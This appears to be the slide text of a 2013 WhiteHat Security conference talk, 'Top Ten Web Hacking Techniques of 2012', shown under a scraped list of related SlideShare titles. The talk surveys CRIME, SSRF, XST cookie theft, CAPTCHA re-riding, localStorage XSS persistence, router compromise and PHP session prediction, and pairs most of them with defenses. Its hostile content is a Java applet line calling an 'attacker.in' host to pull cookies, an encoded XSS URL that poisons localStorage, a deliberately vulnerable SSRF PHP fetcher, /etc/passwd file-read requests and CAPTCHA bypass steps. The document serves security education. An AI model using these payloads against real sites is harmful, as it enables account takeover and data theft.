find out more about the role of autonomous vehicles in facing global challenges
find out more about the role of autonomous vehicles in facing global challengesfind out more about the role of autonomous vehicles in facing global challenges
find out more about the role of autonomous vehicles in facing global challenges
huseindihon
 
Advanced Techniques for Cyber Security Analysis and Anomaly Detection
Advanced Techniques for Cyber Security Analysis and Anomaly DetectionAdvanced Techniques for Cyber Security Analysis and Anomaly Detection
Advanced Techniques for Cyber Security Analysis and Anomaly Detection
Bert Blevins
 
[Talk] Moving Beyond Spaghetti Infrastructure [AOTB] 2024-07-04.pdf
[Talk] Moving Beyond Spaghetti Infrastructure [AOTB] 2024-07-04.pdf[Talk] Moving Beyond Spaghetti Infrastructure [AOTB] 2024-07-04.pdf
[Talk] Moving Beyond Spaghetti Infrastructure [AOTB] 2024-07-04.pdf
Kief Morris
 
Best Programming Language for Civil Engineers
Best Programming Language for Civil EngineersBest Programming Language for Civil Engineers
Best Programming Language for Civil Engineers
Awais Yaseen
 
DealBook of Ukraine: 2024 edition
DealBook of Ukraine: 2024 editionDealBook of Ukraine: 2024 edition
DealBook of Ukraine: 2024 edition
Yevgen Sysoyev
 
Manual | Product | Research Presentation
Manual | Product | Research PresentationManual | Product | Research Presentation
Manual | Product | Research Presentation
welrejdoall
 
Details of description part II: Describing images in practice - Tech Forum 2024
Details of description part II: Describing images in practice - Tech Forum 2024Details of description part II: Describing images in practice - Tech Forum 2024
Details of description part II: Describing images in practice - Tech Forum 2024
BookNet Canada
 
The Rise of Supernetwork Data Intensive Computing
The Rise of Supernetwork Data Intensive ComputingThe Rise of Supernetwork Data Intensive Computing
The Rise of Supernetwork Data Intensive Computing
Larry Smarr
 

Recently uploaded (20)

Fluttercon 2024: Showing that you care about security - OpenSSF Scorecards fo...
Fluttercon 2024: Showing that you care about security - OpenSSF Scorecards fo...Fluttercon 2024: Showing that you care about security - OpenSSF Scorecards fo...
Fluttercon 2024: Showing that you care about security - OpenSSF Scorecards fo...
 
TrustArc Webinar - 2024 Data Privacy Trends: A Mid-Year Check-In
TrustArc Webinar - 2024 Data Privacy Trends: A Mid-Year Check-InTrustArc Webinar - 2024 Data Privacy Trends: A Mid-Year Check-In
TrustArc Webinar - 2024 Data Privacy Trends: A Mid-Year Check-In
 
論文紹介:A Systematic Survey of Prompt Engineering on Vision-Language Foundation ...
論文紹介:A Systematic Survey of Prompt Engineering on Vision-Language Foundation ...論文紹介:A Systematic Survey of Prompt Engineering on Vision-Language Foundation ...
論文紹介:A Systematic Survey of Prompt Engineering on Vision-Language Foundation ...
 
How RPA Help in the Transportation and Logistics Industry.pptx
How RPA Help in the Transportation and Logistics Industry.pptxHow RPA Help in the Transportation and Logistics Industry.pptx
How RPA Help in the Transportation and Logistics Industry.pptx
 
Pigging Solutions Sustainability brochure.pdf
Pigging Solutions Sustainability brochure.pdfPigging Solutions Sustainability brochure.pdf
Pigging Solutions Sustainability brochure.pdf
 
Paradigm Shifts in User Modeling: A Journey from Historical Foundations to Em...
Paradigm Shifts in User Modeling: A Journey from Historical Foundations to Em...Paradigm Shifts in User Modeling: A Journey from Historical Foundations to Em...
Paradigm Shifts in User Modeling: A Journey from Historical Foundations to Em...
 
What’s New in Teams Calling, Meetings and Devices May 2024
What’s New in Teams Calling, Meetings and Devices May 2024What’s New in Teams Calling, Meetings and Devices May 2024
What’s New in Teams Calling, Meetings and Devices May 2024
 
20240702 Présentation Plateforme GenAI.pdf
20240702 Présentation Plateforme GenAI.pdf20240702 Présentation Plateforme GenAI.pdf
20240702 Présentation Plateforme GenAI.pdf
 
Scaling Connections in PostgreSQL Postgres Bangalore(PGBLR) Meetup-2 - Mydbops
Scaling Connections in PostgreSQL Postgres Bangalore(PGBLR) Meetup-2 - MydbopsScaling Connections in PostgreSQL Postgres Bangalore(PGBLR) Meetup-2 - Mydbops
Scaling Connections in PostgreSQL Postgres Bangalore(PGBLR) Meetup-2 - Mydbops
 
Mitigating the Impact of State Management in Cloud Stream Processing Systems
Mitigating the Impact of State Management in Cloud Stream Processing SystemsMitigating the Impact of State Management in Cloud Stream Processing Systems
Mitigating the Impact of State Management in Cloud Stream Processing Systems
 
BLOCKCHAIN FOR DUMMIES: GUIDEBOOK FOR ALL
BLOCKCHAIN FOR DUMMIES: GUIDEBOOK FOR ALLBLOCKCHAIN FOR DUMMIES: GUIDEBOOK FOR ALL
BLOCKCHAIN FOR DUMMIES: GUIDEBOOK FOR ALL
 
Cookies program to display the information though cookie creation
Cookies program to display the information though cookie creationCookies program to display the information though cookie creation
Cookies program to display the information though cookie creation
 
find out more about the role of autonomous vehicles in facing global challenges
find out more about the role of autonomous vehicles in facing global challengesfind out more about the role of autonomous vehicles in facing global challenges
find out more about the role of autonomous vehicles in facing global challenges
 
Advanced Techniques for Cyber Security Analysis and Anomaly Detection
Advanced Techniques for Cyber Security Analysis and Anomaly DetectionAdvanced Techniques for Cyber Security Analysis and Anomaly Detection
Advanced Techniques for Cyber Security Analysis and Anomaly Detection
 
[Talk] Moving Beyond Spaghetti Infrastructure [AOTB] 2024-07-04.pdf
[Talk] Moving Beyond Spaghetti Infrastructure [AOTB] 2024-07-04.pdf[Talk] Moving Beyond Spaghetti Infrastructure [AOTB] 2024-07-04.pdf
[Talk] Moving Beyond Spaghetti Infrastructure [AOTB] 2024-07-04.pdf
 
Best Programming Language for Civil Engineers
Best Programming Language for Civil EngineersBest Programming Language for Civil Engineers
Best Programming Language for Civil Engineers
 
DealBook of Ukraine: 2024 edition
DealBook of Ukraine: 2024 editionDealBook of Ukraine: 2024 edition
DealBook of Ukraine: 2024 edition
 
Manual | Product | Research Presentation
Manual | Product | Research PresentationManual | Product | Research Presentation
Manual | Product | Research Presentation
 
Details of description part II: Describing images in practice - Tech Forum 2024
Details of description part II: Describing images in practice - Tech Forum 2024Details of description part II: Describing images in practice - Tech Forum 2024
Details of description part II: Describing images in practice - Tech Forum 2024
 
The Rise of Supernetwork Data Intensive Computing
The Rise of Supernetwork Data Intensive ComputingThe Rise of Supernetwork Data Intensive Computing
The Rise of Supernetwork Data Intensive Computing
 

Top Ten Web Hacking Techniques of 2012

  • 1. TOP TEN WEB HACKING TECHNIQUES OF 2012
  • 2. ABO U T Jeremiah Grossman ��� Founder & CTO of WhiteHat Security • TED Alumni • InfoWorld Top 25 CTO • Co-founder of the WASC • Co-author: XSS Attacks • Former Yahoo! information security officer • Brazilian Jiu-Jitsu Black Belt Matt Johansen • Head of WhiteHat's Threat Research Center • BlackHat, DEFCON, RSA Speaker • Oversees assessment of 15,000+ websites • Background in Penetration Testing • Hacker turned Management • I'm hiring… a lot… © 2013 WhiteHat Security, Inc. 2
  • 3. ABO U T WhiteHat Security, Inc. • Founded 2001 • Head quartered in Santa Clara, CA • Employees: 260+ • WhiteHat Sentinel: SaaS end-to-end website risk management platform (static and dynamic analysis) • Customers: 500+ (banking, retail, healthcare, etc.) © 2013 WhiteHat Security, Inc. 3
  • 4. ABOUT THE TOP TEN © 2013 WhiteHat Security, Inc. 4
  • 5. ―Every year the security community produces a stunning amount of new Web hacking techniques that are published in various white papers, blog posts, magazine articles, mailing list emails, conference presentations, etc. Within the thousands of pages are the latest ways to attack websites, Web browsers, Web proxies, and their mobile platform equivalents. Beyond individual vulnerabilities with CVE numbers or system compromises, here we are solely focused on new and creative methods of Web-based attack.‖ © 2013 WhiteHat Security, Inc. 5
  • 6. H ISTO RY Past Years 2011 • BEAST (51 new techniques) 2010 • 'Padding Oracle' Crypto Attack (69 new techniques) 2009 • Creating a rogue CA certificate (80 new techniques) 2008 • GIFAR (GIF + JAR) (70 new techniques) 2007 • XSS Vulnerabilities in Common (83 new techniques) Shockwave Flash Files 2006 • Web Browser Intranet Hacking / Port (65 new techniques) Scanning © 2013 WhiteHat Security, Inc. 6
  • 7. T H E YEAR 2 0 1 2 56 NEW Techniques 1. CRIME 2. Pwning via SSRF (memcached, php-fastcgi, etc) 3. Chrome addon hacking 4. Bruteforce of PHPSESSID 5. Blended Threats and JavaScript 6. Cross-Site Port Attacks 7. Permanent backdooring of HTML5 client-side application 8. CAPTCHA Re-Riding Attack 9. XSS: Gaining access to HttpOnly Cookie in 2012 10.Attacking OData: HTTP Verb Tunneling, etc. http://blog.whitehatsec.com/top-ten-web-hacking-techniques-of- 2012/ © 2013 WhiteHat Security, Inc. 7
  • 8. 2 0 1 2 TO P T EN Attacking Odata: HTTP Verb Tunneling, Navigation Properties for Additional Data Access, System Query Options ($select) ―The Open Data Protocol (OData) is an open web protocol for querying and updating data. OData enables the creation of HTTP-based RESTful data services that can be used to publish and edit resources that are identified using uniform resource identifiers (URIs) with simple HTTP messages. This paper looks at OData from a penetration testing perspective and introduces various OData concepts as we progress.‖ Gursev Singh Kalra http://www.mcafee.com/us/resources/white-papers/foundstone/wp-pentesters-guide-to-hacking-odata.pdf © 2013 WhiteHat Security, Inc. 8
  • 9. 2 0 1 2 TO P T EN XSS: Gaining access to HttpOnly Cookie in 2012 ‗If the HttpOnly flag (optional) is included in the HTTP response header, the cookie cannot be accessed through client side script. As a result, even if a cross-site scripting (XSS) flaw exists, and a user accidentally accesses a link that exploits this flaw, the browser will not reveal the cookie to a third party. The following describes techniques to gain access to HttpOnly cookie data via client- side attack.‖ http://seckb.yehg.net/2012/06/xss-gaining-access-to-httponly-cookie.html © 2013 WhiteHat Security, Inc. 9
  • 10. BASIC S HttpOnly cookie flag Set-Cookie: <name>=<value>[; <Max-Age>=<age>] [; expires=<date>][; domain=<domain_name>] [; path=<some_path>][; secure][; HttpOnly] js> alert(document.cookie); When a cookie has an HttpOnly cookie flag the returned value is blank. https://www.owasp.org/index.php/HttpOnly © 2013 WhiteHat Security, Inc. 10
  • 11. H ISTO RY CROSS-SITE TRACING (XST) [circa 2003] Force cookie values into the body of the HTTP response where there is no HttpOnly protection. <script> TRACE / HTTP/1.1 var xmlhttp = new XMLHttpRequest(); Host: foo.bar var url = 'http://foo.com/'; HTTP/1.1 200 OK // send cookie header Date: Mon, 02 Dec 2002 19:24:51 GMT xmlhttp.withCredentials = true; Server: Apache/2.0.40 (Unix) xmlhttp.open('TRACE', url, false); Content-Type: message/http xmlhttp.send(); TRACE / HTTP/1.1 </script> Host: foo.com Cookie: httpOnly cookie value Performing an XST attack, at the time, required either a cross-domain browser vulnerability, or an XSS vulnerability in the target website. https://www.owasp.org/index.php/Cross_Site_Tracing http://www.cgisecurity.com/lib/WH-WhitePaper_XST_ebook.pdf © 2013 WhiteHat Security, Inc. 11
  • 12. BR O W SER F IX No TRACE (No TRACK) Today, no modern browser allows javascript to use these HTTP request methods. The same is true of Flash, Silverlight, and Java Applets. Well, almost… © 2013 WhiteHat Security, Inc. 12
  • 13. XST 2 0 1 2 Java Applet (PoC) getHeaderField, under the java.net.URLConnection package Applet requests a URL and reads set-cookie response header alert(new java.net.URL('http://attacker.in/xss/cookie.php').openConnection().getHeaderFi eld('set-cookie')); “…a vulnerable page in a real- world application may have already issued the HttpOnly cookie by the time the script has executed.” Might also be able force out all cookies by overloading them. Cookie Exhaustion. http://www.slideshare.net/jeremiahgrossman/breaking-browsers-hacking-autocomplete-blackhat-usa-2010 © 2013 WhiteHat Security, Inc. 13
  • 14. SO L U T ION UNINSTALL JAVA [on the client, not the server] For this and about 1,000 other [zero-day] reasons. © 2013 WhiteHat Security, Inc. 14
  • 15. 2 0 1 2 TO P T EN CAPTCHA Re-Riding Attack ―CAPTCHA Re-Riding Attack bypasses the CAPTCHA protection built into the web applications. The attack exploits the fact that the code that verifies CAPTCHA solutions sent by the user during form submissions does not clear the CAPTCHA solution from the HTTP Session.‖ Completely Automated Public Turing test to tell Computers and Humans Apart Gursev Singh Kalra http://gursevkalra.blogspot.com/2012/03/captcha-re-riding-attack.html © 2013 WhiteHat Security, Inc. 15
  • 16. BASIC S CAPTCHA Protected Registration Flow © 2013 WhiteHat Security, Inc. 16
  • 17. T EL LTAL E SIG N S What to look for… 1) captcha.php is responsible for updating the HTTP session with correct CAPCHA solution. 2) CAPTCHA solution inside the HTTP session is not explicitly cleared during the verification process. 3) After registration succeeds, users are redirected to next step and the CAPTCHA generation page (/captcha.php) is not likely called for current SESSION again. Allows CAPTCHA solution to stay stored for as long as SESSION is valid. Two possible vulnerable behavior: a. Web application uses the same SESSIONID for the same HTTP session. b. Web application generates a new SESSIONID for the same HTTP session. In either case, the HTTP Session continues to store the CAPTCHA solution as it is not explicitly cleared by the CAPTCHA verification code…. © 2013 WhiteHat Security, Inc. 17
  • 18. AT TAC K 3a) 1) Load the register page of the target website in a web browser. 2) Solve the CAPTCHA manually and submit the form. 3) Record form submission using a web proxy. This request contains a valid SESSIONID, valid form fields, and a valid CAPTCHA solution. 4) Create a custom script that repeatedly sends this request to the server. With each request change the unique values (like User ID) to create multiple new accounts with a single CAPTCHA solution. © 2013 WhiteHat Security, Inc. 18
  • 19. AT TAC K 3b) 1) Load the register page of the target website in a web browser. 2) Solve the CAPTCHA manually, and submit the form. 3) Trap this request in a web proxy and do not allow it to reach the web server. This request contains a valid SESSIONID, valid form fields and a valid CAPTCHA solution. 4) Create a custom script that repeatedly sends this request to server. 5) Submit one request. 6) Upon successful submission, the web application will reset the current SESSIONID and send new SESSIONID back in response headers. 7) Change the value of SESSIONID in recorded request (step 3) to the value copied from response in Step 6 above. 8) Go to step 5. 9) Able to make multiple successful submissions with single CAPTCHA solution. © 2013 WhiteHat Security, Inc. 19
  • 20. D EF EN SE ―The best defense is to reset CAPTCHA solution inside the HTTP session during the CAPTCHA verification stage. It is also important to note that when a website relies on third-party CAPTCHA provider, it does not maintain any session information at its end and CAPTCHA is performed by the CAPTCHA provider. These websites are not vulnerable to CAPTCHA Re-Riding Attack.‖ © 2013 WhiteHat Security, Inc. 20
  • 21. 2 0 1 2 TO P T EN Permanent backdooring of HTML5 client-side application ―To improve performance, particularly for mobile users, many websites have started caching app logic on client devices via HTML5 local storage. Unfortunately, this can make common injection vulnerabilities even more dangerous, as malicious code can invisibly persist in the cache. Real-world examples of this problem have now been discovered in third-party ―widgets‖ embedded across many websites, creating security risks for the companies using such services – even if their sites are otherwise protected against attacks.‖ Joey Tyson http://securitymusings.com/article/3159/how-a-platform-using-html5-can-affect-the-security-of-your-website © 2013 WhiteHat Security, Inc. 21
  • 22. PR ER EQ U ISIT ES What to watch out for… • A Web application caching [javascript] code in HTML5 local storage, rather than routinely downloading it across the network every time the app/page is visited. Developers find doing this may provide a significant performance boost, particularly on mobile devices, where bandwidth and typical caches can be much more limited. What the bad guy may do next… • If the code saved in the local storage is compromised, via XSS exploit for example, an attacker could inject malicious code that persists in the client-side cache. This payload would then be executed by the web app each time a user opens the site – even if they‘d previously closed the browser. A single ―reflected‖ XSS attack can poison the local storage for every following page the user visits on that site. © 2013 WhiteHat Security, Inc. 22
  • 23. M ASS PW N AG E Making Matters Worse: • Eradicating such [malicious] code can be quite difficult, and the victim website might not even be able to detect an ongoing attack. • Reminder: When a developer includes third-party JavaScript on his or her site, that code has the same capabilities as any other script on the page. • Modifying static file on a remote server is generally not possible, even if cross-site scripting issues are present, but what if a third-party script from a site with XSS problems also stored code in local storage? “If content from the compromised origin is commonly embedded on third-party pages (think syndicated „like‟ buttons or advertisements), with some luck, attacker‟s JavaScript may become practically invincible.” - Michal Zalewski http://events.ccc.de/congress/2011/Fahrplan/events/4811.en.html http://jeremiahgrossman.blogspot.com/2010/07/third-party-web-widget-security-faq.html © 2013 WhiteHat Security, Inc. 23
  • 24. IN - T H E -WILD Apture (acquired by Google): • Provided pop-up boxes for exploring content related to highlighted terms in a page. • A 3rd-party ―widget‖ service that used local storage code caching – and a page on the same domain as those scripts had a reflected XSS vulnerability which could be used to inject malicious code in the cache. This code would then be executed in the context of the site using Apture. The problem with Apture‘s service affected the security of many sites across the web. © 2013 WhiteHat Security, Inc. 24
  • 25. U SAG E To use Apture widgets: • Dynamically loaded an external script hosted on apture.com with a site token specified. This code loaded another script based on the user‘s browser which actually began setting up the framework for Apture to integrate with the site‘s content. • The script inserted an inline frame into the page that loaded a file from cdn.apture.com. A callback function allowed this iframe to pass messages back to the original window context where the script is running (the non-Apture site). This iframe then loaded the actual app logic and passed the code back to the original site via the cross-document messaging interface. • Apture‘s iframe setup allowed them to take advantage of another HTML5 innovation that made their service load much faster. Web storage functionality provides the localStorage object, a place to save key/value data on the client which allows for more space and flexibility than cookies. • Apture used a localStorage object for cdn.apture.com not only to save data, such as an ID for tracking users, but to actually cache their app logic code. If the cdn.apture.com iframe detected that this cache already existed, it would simply load the code from localStorage rather than issue another HTTP request for the 272KB worth of JavaScript – saving time and bandwidth. © 2013 WhiteHat Security, Inc. 25
  • 26. EXPL O ITAT ION EVAL is EVIL Like everyone else, Apture had an exploitable XSS vulnerability. This URL includes a script that appends ―alert(document.cookie)‖ to the app logic in localStorage: http://cdn.apture.com/search/xss?yt=%22%3E%3Cscript%3Eif%28window.x%21%3D1%29%7Blo calStorage%5B%27app-49971756%27%5D%3DlocalStorage%5B%27app- 49971756%27%5D%2b%22alert%28document.cookie%29%3B%22%7Dwindow.x%3D1%3C% 2fscript%3E Once this vulnerability is used to insert attack code into localStorage, visiting any site that had Apture‘s widgets would cause the attack code to be loaded from the Apture iframe and executed in the context of the non-Apture site. Since this is essentially an example of DOM-based XSS (the code is loaded dynamically on the client side), requests sent to those sites‘ servers would not include any XSS fingerprints, such as <script> in a GET or POST parameter. The localStorage code caching turned one reflected XSS vulnerability on Apture’s site into persistent, client-side XSS across all domains using their service. © 2013 WhiteHat Security, Inc. 26
  • 27. D EF EN SE No Simple Answers  Trade-offs between performance and risk • Application cache, another new HTML5 features, is actually geared towards precisely this use case and harder to compromise, but it can create UI warnings in some browsers [Firefox]. (Such warnings are a good practice, but undesirable for third-party widgets.) • Data in local storage should be treated as untrusted, even if it‘s just content instead of code. • If local storage is used for scripts, it should be accessed from a domain only serving static files, which reduces the likelihood of XSS vulnerabilities. • Newer browsers also support features such as sandboxed inline frames and Content Security Policy that could help limit the impact of embedded widgets if they became compromised. © 2013 WhiteHat Security, Inc. 27
  • 28. 2 0 1 2 TO P T EN Cross-Site Port Attacks ―Many web applications provide functionality to pull data from other webservers for various reasons. Using user specified URLs, web applications can be made to fetch images, download XML feeds from remote servers, text based files etc. This functionality can be abused by making crafted queries using the vulnerable web application as a proxy to attack other services running on remote/local servers. Attacks arising via this abuse of functionality are named as Cross- Site Port Attacks (XSPA).‖ ―Riyaz Ahemed Walikar http://www.riyazwalikar.com/2012/11/cross-site-port-attacks-xspa-part-1.html Robert Hansen http://www.sectheory.com/intranet-hacking.htm © 2013 WhiteHat Security, Inc. 28
  • 29. 3 - T IER XSPA allows attackers to abuse functionality in web applications to: 1. Port Scan remote Internet facing servers, intranet devices and the local web server itself. 2. Exploiting vulnerable programs running on the Intranet or on the local web server 3. Attacking internal/external web applications that are vulnerable to GET parameter based vulnerabilities (SQLi via URL, parameter manipulation etc.) 4. Fingerprinting intranet web applications using standard application default files & behavior 5. Reading local web server files using the file:/// protocol handler. © 2013 WhiteHat Security, Inc. 29
  • 30. T EL LTAL E SIG N © 2013 WhiteHat Security, Inc. 30
  • 31. C O D E SAMPL E <?php if (isset($_POST['url'])) { $link = $_POST['url']; $filename = './curled/'.rand().'txt'; $curlobj = curl_init($link); $fp = fopen($filename,"w"); curl_setopt($curlobj, CURLOPT_FILE, $fp); curl_setopt($curlobj, CURLOPT_HEADER, 0); curl_exec($curlobj); curl_close($curlobj); fclose($fp); $fp = fopen($filename,"r"); $result = fread($fp, filesize($filename)); fclose($fp); echo $result; ?> © 2013 WhiteHat Security, Inc. 31
  • 32. R EAL - W ORL D AT TAC K Port Scanning using Google Webmaster Tools © 2013 WhiteHat Security, Inc. 32
  • 33. AT TAC K Port Scanning using Google Webmaster Tools © 2013 WhiteHat Security, Inc. 33
  • 34. AT TAC K Port Scanning using Google Webmaster Tools © 2013 WhiteHat Security, Inc. 34
  • 35. AT TAC K Reading local files using file:/// protocol Request: file:///C:/Windows/win.ini © 2013 WhiteHat Security, Inc. 35
  • 36. AT TAC K Adobe's Omniture web application file:///etc/passwd © 2013 WhiteHat Security, Inc. 36
  • 37. D EF EN SE • Response Handling: If a web application expects specific content type on the server, programmatically ensure the data received satisfies checks imposed on the server before displaying or processing the data for the client. • Error handling and messages: Display generic error messages when something goes wrong. If content type validation fails, display generic errors to the client like "Invalid Data retrieved". Also ensure message are the same when the request fails on the backend and if invalid data is received. This prevents the application from being abused as distinct error messages will be absent for closed and open ports. • Restrict connectivity to HTTP based ports: Restrict the ports to which the web application can connect to, such as HTTP ports: 80, 443, 8080, 8090 etc. Doing so can lower the attack surface. • Blacklist IP addresses: Internal IP addresses, localhost specifications and internal hostnames can all be blacklisted to prevent the web application from being abused to fetch data/attack these devices. • Disable unwanted protocols: Only allow http and https to make requests to remote servers. Whitelisting these protocols will prevent the web application from making requests over other protocols like file:///, gopher://, ftp:// and other URI schemes. © 2013 WhiteHat Security, Inc. 37
  • 38. 2 0 1 2 TO P T EN Blended Threats and JavaScript ―During 2006, it was shown how common Web browser attacks could be leveraged bypass perimeter firewalls. In the years since, the fundamental problems were never addressed and the Intranet remains wide open, probably because the attack techniques described had important limitations. These limitations prevented mass scale and persistent compromise of network connected devices, which include but are not limited to home broadband routers. Now in 2012, with the help of new research and next-generation technologies like HTML5, browser-based Intranet attacks have overcome many of the old limitations and improved to a new degree of scary.‖ Phil Purviance and Josh Brashars https://superevr.com/blog/2012/blended-threats-and-javascript/ © 2013 WhiteHat Security, Inc. 38
  • 39. BASIC S Web Threats -> Network Compromise • Utilize an XSS bug to poke holes in Intranet network • Take advantage of very outdated security in routers • Flash the firmware of that router via XSS, File Upload Abuse, & CSRF • Permanent compromise © 2013 WhiteHat Security, Inc. 39
  • 40. T H E AT TAC K Scan The Intranet Yay HTML5! JavaScript Intranet scan, nothing new or fancy but does return a list of internal Ips that are up and listening. © 2013 WhiteHat Security, Inc. 40
  • 41. T H E AT TAC K Gain Access The easy way © 2013 WhiteHat Security, Inc. 41
  • 42. Real World Examples © 2013 WhiteHat Security, Inc. 42
  • 43. T H E AT TAC K Gain Access The less easy way © 2013 WhiteHat Security, Inc. 43
  • 44. Basic Auth Brute Force © 2013 WhiteHat Security, Inc. 44
  • 45. EXPL O IT HTML5 File Upload Load Malicious Firmware to memory https://github.com/superevr/ddwrt-install-tool © 2013 WhiteHat Security, Inc. 45
  • 46. D EF EN SE Router • Change default passwords! Browser • NoScript, Request Policy, Other XSS & CSRF protections © 2013 WhiteHat Security, Inc. 46
  • 47. 2 0 1 2 TO P T EN Bruteforce of PHPSESSID ―...We provide a number of practical techniques and algorithms for exploiting randomness vulnerabilities in PHP applications. We focus on the predictability of password reset tokens and demonstrate how an attacker can take over user accounts in a web application via predicting or algorithmically derandomizing the PHP core randomness generators.‖ Arseny Reutov, Timur Yunusov, and Dmitry Nagibin http://blog.ptsecurity.com/2012/08/not-so-random-numbers-take-two.html George Argyros and Aggelos Kiayias http://crypto.di.uoa.gr/CRYPTO.SEC/Randomness_Attacks_files/paper.pdf http://crypto.di.uoa.gr/CRYPTO.SEC/Randomness_Attacks.html © 2013 WhiteHat Security, Inc. 47
  • 48. BASIC S PHPSESSID = md5( client IP . timestamp . microseconds1 . php_combined_lcg() ) • client IP is known to the attacker; • timestamp is known through Date HTTP-header; • microseconds1 – a value from 0 to 1000000; • php_combined_lcg() – an example value is 0.12345678. To generate php_combined_lcg(), two seeds are used: S1 = timestamp XOR (microseconds2 << 11) S2 = pid XOR (microseconds3 << 11) • timestamp is the same; • microseconds2 is greater than microseconds1 (when the first time measurement was made) by 0–3; • pid is the id of the current process (0–32768, 1024–32768 on Unix); • microseconds3 is greater than microseconds2 by 1–4. “The greatest entropy is contained in microseconds1, however with the use of two techniques it can be substantially reduced.” © 2013 WhiteHat Security, Inc. 48
  • 49. T EC H N IQ UE 1 Adversarial Time Synchronization ATS: Send a pair of HTTP requests to determine the moment when the second in the Date HTTP header changes. 1) Connect to a web server and send request pairs: 1st to a non- existent page so it‘ll take a minimum time for the web-server to return the response. The 2nd to our target web-application. HTTP/1.1 200 OK 2) Get an average time interval between sending an HTTP Date: Wed, 08 Aug 2012 06:05:14 GMT request and receiving the response (= RTT) … HTTP/1.1 200 OK 3) When the seconds in Date HTTP-header of the two requests Date: Wed, 08 Aug 2012 06:05:15 GMT changed approximate the time of remote microseconds in local time using RTTs of the two requests divided by two and offsetting the delay between requests. 4) If session_start() is called somewhere deeper in the code, you may try to install the web-app locally and get the approximate time when it is called. “...the microseconds between our requests zeroed. By sending requests with dynamic delays it is possible to synchronize local value of microseconds with the server one.” © 2013 WhiteHat Security, Inc. 49
  • 50. T EC H N IQ UE 2 Request Twins Attacker send two requests: the 1st — to reset their own password and the 2nd — to reset that of an administrator. The gap between microseconds will be minimal. To increase speed over the PasswordPro module by taking advantage of positive linear correlation between deltas of microseconds, they created their own application. 16 million hashes per second, seed calculation takes less than an hour on 3.2 GHz Quad Core i5. Having pid and php_combined_lcg one can compute the seed used in mt_rand. (timestamp x pid) XOR (106 x php_combined_lcg()) “if a web application uses standard PHP sessions, it is possible to obtain the random numbers generated via mt_rand(), rand(), and uniqid().” © 2013 WhiteHat Security, Inc. 50
  • 51. T EC H N IQ UE 3 Get mt_rand seed through random numbers leakage “The seed used for mt_rand is an unsigned integer 2^32. If a random number leaked, it is possible to get the seed using PHP itself and rainbow tables. It takes less than 10 minutes.” The scripts to generate rainbow tables, search the seed, and ready-made tables http://www.gat3way.eu/poc/mtrt/ © 2013 WhiteHat Security, Inc. 51
  • 52. SO L U T IONS What to look for and code defense “All the mt_rand(), rand(), uniqid(), shuffle(), lcg_value(), etc. The only secure function is openssl_random_pseudo_bytes(), but it is rarely used in web applications.” • MySQL function RAND() — it can be also predicted though. • Suhosin patch — does not patch mt_srand, srand. The Suhosin extension should also be installed. • /dev/urandom — the securest way. © 2013 WhiteHat Security, Inc. 52
  • 53. 2 0 1 2 TO P T EN Chrome addon hacking ―Webpages can sometimes interact with Chrome addons and that might be dangerous. Chrome addons fingerprinting, universal XSS, bypass AdBlock, Chrome Extension Exploitation Framework, and owning a system.‖ ―Krzysztof Kotowicz http://blog.kotowicz.net/2012/02/intro-to-chrome-addons-hacking.html http://blog.kotowicz.net/2012/02/chrome-addons-hacking-want-xss-on.html http://blog.kotowicz.net/2012/03/chrome-addons-hacking-bye-bye-adblock.html http://blog.kotowicz.net/2012/07/xss-chef-chrome-extension-exploitation.html http://blog.kotowicz.net/2012/09/owning-system-through-chrome-extension.html © 2013 WhiteHat Security, Inc. 53
  • 54. H ISTO RY Hacking Google ChromeOS “Googleʼsdrive to move away from the desktop, and into the cloud results in desktop applications being replaced with HTML5 & JavaScript rich extensions. These new “desktop programs” seem to be more secure, because they do not have the classic vulnerabilities that desktop applications end services have--buffer/stack/heap overflows/underflows, format string attacks, plus many more. Since exploitation no longer leads to shell, the real dangers and implications of any exploit seem to be mitigated. Unfortunately, this is not true. HTML and Javascript applications (Chrome Extensions) are now vulnerable to standard HTML and Javascript attacks. The most serious, in this situation, is Cross Site Scripting. By utilizing an XSS vulnerability in an extension, an attacker can pivot from that extension, and take advantage of the permissions given to it to attack and gain access to user information loaded in other tabs.” -Matt Johansen & Kyle Osborn BlackHat 2011 WhitePaper © 2013 WhiteHat Security, Inc. 54
  • 55. BASIC S Why Chrome Extensions? • Basic HTML applications • Access to extensive APIs • Permissions set by 3rd party Dev • Manifest.json • Sandbox side-step Exploitation • Universal XSS via 1 extension bug • chrome.tabs, chrome.history, chrome.cookies, chrome.proxy, API access make for powerful attacks • Filesystem access and remote code execution made easy © 2013 WhiteHat Security, Inc. 55
  • 56. APPL IC AT IO N BeEF & ChEF • You‘ve found XSS in an extension, utilized it to exploit Javascript in any tab. Now what? Browser Exploitation Framework & Chrome Extension Exploitation Framework • BeEF – Metasploit of the web. Makes reflective XSS more persistent and able to replay exploits • ChEF – BeEF for Chrome Extensions. • Monitor current sessions / open tabs • Execute JavaScript on any site in any tab • Access localStorage • Read / write cookies • Manipulate browser history • Take screenshots • Inject BeEF hooks to utilize their payloads and exploits © 2013 WhiteHat Security, Inc. 56
  • 57. C H EF ChEF Console © 2013 WhiteHat Security, Inc. 57
  • 58. EXPL O ITAT ION XSS Everywhere • If an extension‘s ‗manifest.json‘ file has permissions set to ‗*‘ you can execute JavaScript anywhere in the browser with ‗chrome.tab.executeScript‘ • Bypass AdBlock: By altering the DOM you can create a global whitelist © 2013 WhiteHat Security, Inc. 58
  • 59. D EF EN SE Beware © 2013 WhiteHat Security, Inc. 59
  • 60. 2 0 1 2 TO P T EN Pwning via SSRF (memcached, php-fastcgi, etc) ―SSRF, as in Server-Side Request Forgery. A great concept of the attack which was discussed in 2008 with very little information about theory and practical examples. The idea is to find victim server interfaces that will allow sending packets initiated by victim's server to the localhost interface of the victim server or to another server secured by firewall from outside. We have found various SSRF vulnerabilities which allow internal network port scanning, sending any HTTP requests from server, bruteforcing backed and more but the most powerful technique was XXE Tunneling.‖ Alexander Polyakov http://media.blackhat.com/bh-us-12/Briefings/Polyakov/BH_US_12_Polyakov_SSRF_Business_WP.pdf http://erpscan.com/press-center/blog/ssrf-via-ws-adressing/ http://erpscan.com/wp-content/uploads/2012/11/SSRF.2.0.poc_.pdf © 2013 WhiteHat Security, Inc. 60
